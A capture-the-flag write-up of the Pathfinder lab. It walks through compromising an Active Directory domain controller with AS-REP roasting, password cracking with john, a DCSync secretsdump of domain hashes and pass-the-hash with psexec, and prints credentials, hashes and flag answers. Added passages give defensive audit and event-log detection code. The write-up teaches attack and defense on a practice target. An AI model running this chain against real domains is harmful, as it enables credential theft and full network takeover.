Pathfinder

IP: 10.10.10.30

Enumeration

# nmap -sC -sV -v -Pn 10.10.10.30
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 08:52 EDT
....................................

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-09-24 20:06:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h13m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-09-24T20:07:01
|_  start_date: N/A

Everything indicates that this

In the previous lab (Shield) we obtained sandra's AD credentials:

Username : sandra Domain : MEGACORP.LOCAL Password : Password1234!

Let's run a few tests:

1 - check whether sandra's credentials can be used to enumerate network shares:

# smbclient -U sandra -L \\\\10.10.10.30\\
Enter WORKGROUP\sandra's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

The output above shows that the credentials we tested are valid. Now let's check whether we have write access to any of the listed shares:

# python3 /usr/share/doc/python3-impacket/examples/psexec.py megacorp/sandra:'Password1234!'@10.10.10.30
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

Unfortunately the scope of the "sandra" user is limited. We'll try other approaches.

Exploitation

Let's check whether any Kerberos-enabled user can make some interesting requests to the server without needing password-based authentication. The Python script GetNPUsers.py helps us do this. Basically it will attempt the following:

The script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). For those users with such configuration, a John The Ripper output will be generated so you can send it for cracking.

# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py megacorp.local/sandra -dc-ip 10.10.10.30
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
Name     MemberOf                                                    PasswordLastSet             LastLogon                   UAC      
-------  ----------------------------------------------------------  --------------------------  --------------------------  --------
svc_bes  CN=Remote Management Users,CN=Builtin,DC=MEGACORP,DC=LOCAL  2020-03-20 20:16:54.721477  2021-09-24 18:09:18.186634  0x400200 

The user in question is svc_bes.
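From the defender's side, the same condition the script looks for can be audited and monitored. The following Python is an added example (not part of the original writeup): it decodes the userAccountControl value (the UAC column above, 0x400200 for svc_bes) to find accounts that do not require pre-authentication, and scans Security event 4768 records for TGT requests made without pre-authentication, which is what an AS-REP roasting attempt looks like in the logs. The account records and event records are constructed; the `10.10.14.5` source address is a made-up value.

```python
"""Audit and detection helper for AS-REP roasting exposure.

Added example, not part of the original writeup. The account records and
4768 events below are constructed samples; a real audit would feed the
results of an LDAP query and parsed Security-log events into the same
functions.
"""

# userAccountControl bits (well-known Active Directory constants).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000


def decode_uac(value):
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_exposed(accounts):
    """Enabled accounts whose TGT can be requested without pre-authentication.

    Disabled accounts are skipped because the KDC refuses them anyway, so the
    list is exactly the set a roasting tool could obtain a crackable blob for.
    """
    return sorted(
        a["sAMAccountName"]
        for a in accounts
        if a["userAccountControl"] & DONT_REQ_PREAUTH
        and not a["userAccountControl"] & ACCOUNTDISABLE
    )


def asrep_roast_indicators(events):
    """(user, source ip, ticket etype) for 4768 events with PreAuthType 0.

    PreAuthType 0 means "logon without pre-authentication". Tools usually
    also ask for the RC4 etype (0x17) so the blob cracks quickly; the etype
    is returned so a rule can weight RC4 requests higher.
    """
    return [
        (e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
        for e in events
        if e["EventID"] == 4768 and e["PreAuthType"] == 0
    ]


# Constructed sample of an LDAP query for userAccountControl. The svc_bes
# value matches the UAC column in the GetNPUsers output; the others are invented.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_bes", "userAccountControl": 0x400200},
    {"sAMAccountName": "sandra", "userAccountControl": 0x200},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202},  # disabled
]

# Constructed 4768 events: one roasting-style request, one normal AES logon.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_bes", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "sandra", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.10.31"},
]

if __name__ == "__main__":
    print("svc_bes UAC flags:", decode_uac(0x400200))
    print("exposed accounts:", asrep_exposed(SAMPLE_ACCOUNTS))
    print("AS-REP roast indicators:", asrep_roast_indicators(SAMPLE_EVENTS))
```

The fix for an exposed account is to clear the "Do not require Kerberos preauthentication" flag and, if it had to stay set for a legacy reason, give the account a long random password so the returned blob is not crackable.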

Let's try to obtain hashes remotely through this weakness:

# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
$krb5asrep$svc_bes@MEGACORP.LOCAL:2d18b70dd7eda2ecf0b9efa89ae71da9$d219a6999ca898106d61f8cdd10da2e2daef6f6b232f49d7ac9326c9ecb8ed8529b0b45167d9016c0766d02956dbfb1ff90adb89a11780ce4385d52fb845e84202858ee1dc25b66f94d0de223386fd70ef7516978b232f6c30a0e23d8617c75bd69e801378406428e5b2a0028e7f0a27fbd9fcb392c36edaa0688c5688c3cfb42dff5b7e7928f59c069e93a23a6dcd2c9aebfdd76a9c10038ef3c5a43fd090401557545656909f320436eb240c44cd57eebefeea7e8645eb57ba00cf81f718f10825e259178a998d58eae63fa44e614e56852d7443aef4f3317862a874eae44fee09feeb981ec18171863f9f305c7110

Done. We got the AS-REP hash of the AD user svc_bes. Let's save the following hash into a text file called hash.txt:

$krb5asrep$svc_bes@MEGACORP.LOCAL:2d18b70dd7eda2ecf0b9efa89ae71da9$d219a6999ca898106d61f8cdd10da2e2daef6f6b232f49d7ac9326c9ecb8ed8529b0b45167d9016c0766d02956dbfb1ff90adb89a11780ce4385d52fb845e84202858ee1dc25b66f94d0de223386fd70ef7516978b232f6c30a0e23d8617c75bd69e801378406428e5b2a0028e7f0a27fbd9fcb392c36edaa0688c5688c3cfb42dff5b7e7928f59c069e93a23a6dcd2c9aebfdd76a9c10038ef3c5a43fd090401557545656909f320436eb240c44cd57eebefeea7e8645eb57ba00cf81f718f10825e259178a998d58eae63fa44e614e56852d7443aef4f3317862a874eae44fee09feeb981ec18171863f9f305c7110

And now we'll try to crack this hash with john.

# john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:23 DONE (2021-09-24 11:09) 0.04228g/s 448330p/s 448330c/s 448330C/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So now we have one more valid credential for host PATHFINDER:

user: svc_bes pass: Sheffield19

Apparently the "svc_bes" user has somewhat higher privileges than the "sandra" user.

Let's try to dump other users' hashes as the "svc_bes" user with secretsdump.py:

# secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:7c7cbf1c0e343f968e74c7dd7088562c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:b695d90101bf1408c0fd67f5eb28be7e56dcf0de71c046a1e31730eb21a2b52b
PATHFINDER$:aes128-cts-hmac-sha1-96:1add94bf3b92632f195904796c37fd11
PATHFINDER$:des-cbc-md5:86d34a79d66d3d80
[*] Cleaning up... 
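The line "Using the DRSUAPI method to get NTDS.DIT secrets" means the dump did not read a file from disk: the tool asked the domain controller to replicate the account secrets, the same request another DC would make. Only domain controller computer accounts normally exercise that right, so a replication request from a plain user account is a strong signal. The following Python is an added example (not part of the original writeup) that applies that rule to Security event 4662 records; the event records are constructed, and the replication-right GUIDs are the standard Active Directory control-access-right values.

```python
"""Detection helper for DCSync-style replication requests (event 4662).

Added example, not part of the original writeup. The events below are
constructed; a real pipeline would feed parsed 4662 records from the
domain controllers' Security logs into dcsync_alerts().
"""

# Control-access-right GUIDs for directory replication (well-known AD values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask value for an extended/control-access right


def _norm(guid):
    """Event text wraps GUIDs in braces; compare without them, case-insensitively."""
    return guid.strip("{}").lower()


def dcsync_alerts(events, dc_accounts):
    """(subject, rights) pairs for non-DC principals exercising replication rights.

    dc_accounts is the list of domain controller computer accounts (with the
    trailing '$'); requests from those are legitimate replication traffic.
    """
    dcs = {d.upper() for d in dc_accounts}
    alerts = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != CONTROL_ACCESS:
            continue
        rights = tuple(
            REPLICATION_RIGHTS[_norm(g)]
            for g in e["Properties"]
            if _norm(g) in REPLICATION_RIGHTS
        )
        if rights and e["SubjectUserName"].upper() not in dcs:
            alerts.append((e["SubjectUserName"], rights))
    return alerts


# Constructed 4662 events: a user account replicating (the pattern behind the
# dump above), the DC's own account doing the same, and an unrelated read.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "svc_bes", "AccessMask": 0x100,
     "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"EventID": 4662, "SubjectUserName": "PATHFINDER$", "AccessMask": 0x100,
     "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"EventID": 4662, "SubjectUserName": "sandra", "AccessMask": 0x10,
     "Properties": ["{bf967a86-0de6-11d0-a285-00aa003049e2}"]},  # constructed
]

if __name__ == "__main__":
    for subject, rights in dcsync_alerts(SAMPLE_EVENTS, ["PATHFINDER$"]):
        print(f"ALERT: {subject} requested {', '.join(rights)}")
```

Auditing of directory service access has to be enabled on the domain controllers for 4662 to be logged at all, and the fix on the permissions side is to find which ACE on the domain object grants the replication rights to a non-DC principal and remove it; after a dump like the one above, every affected credential, including krbtgt, has to be rotated.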

With that done, we now have the Administrator user's hash in hand. We could try to crack it with john or hashcat, but we can also use the pass-the-hash technique, where we use the hash instead of the password to get a shell.

# psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18           
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[*] Found writable share ADMIN$
[*] Uploading file EtScLWQX.exe
[*] Opening SVCManager on 10.10.10.30.....
[*] Creating service sIKp on 10.10.10.30.....
[*] Starting service sIKp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

We just got a remote shell on the server!

Post-Exploitation

All that remains is to collect the flags for the regular user and for Administrator.

C:\Users\svc_bes\Desktop>type user.txt
b05fb166688a8603d970c6d033f637f1
C:\Users\Administrator\Desktop>type root.txt
ee613b2d048303e5fd4ac6647d944645
